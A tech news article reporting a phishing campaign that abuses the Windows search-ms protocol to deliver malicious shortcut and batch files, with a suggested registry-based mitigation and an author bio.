Hackers are hijacking Windows Search to hit victims with malware

A fish hook is lying across a computer keyboard, representing a phishing attack on a computer system

(Image credit: weerapatkiatdumrong / Getty Images)

Experts have discovered a low-volume, but very clever, cybercrime campaign abusing the Windows search functionality to trick victims into downloading malware.

The campaign was discovered by cybersecurity researchers from Trustwave SpiderLabs, who described it as both “clever” and being low in volume.

“This technique cleverly obscures the attacker’s true intent, exploiting the trust users place in familiar interfaces and common actions like opening email attachments,” the researchers said in their write-up.

Be wary of your inbox

The attack starts with a phishing email pretending to be an invoice, or something similar. It carries a .ZIP archive of an HTML file, and thus successfully bypasses antivirus and email security programs that overlook compressed contents.

The HTML file opens up the browser and forces it to directly interact with Windows Explorer’s search function. In turn, Windows Explorer is tasked with searching for items labeled as “INVOICE”, in a specific directory - a server tunneled via Cloudflare. Furthermore, the search is renamed to “Downloads”, ultimately tricking victims into thinking they were actually looking at the file they “downloaded”, and not the .ZIP archive.

Among the files then presented to the victims is a shortcut document (.LNK) that points to a batch script (.BAT) hosted on the same server. This script, if activated, triggers additional malicious operations.

Unfortunately, by the time they started analyzing the campaign, the server was shut down, preventing the researchers from obtaining the payload. Therefore, it is impossible to know what kind of malware the attackers were distributing.

To mitigate the threat, users could disable search-ms/search URI protocol handlers by deleting associated registry entries.

Alternatively, they should be wary of incoming emails carrying attachments: “As users continue to navigate an increasingly complex threat landscape, ongoing education, and proactive security strategies remain paramount in safeguarding against such deceptive tactics,” the researchers concluded.

More from TechRadar Pro

HTML attachments are more of a security risk than ever - here's what you need to know
Here's a list of the best firewalls today
These are the best endpoint protection tools right now

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.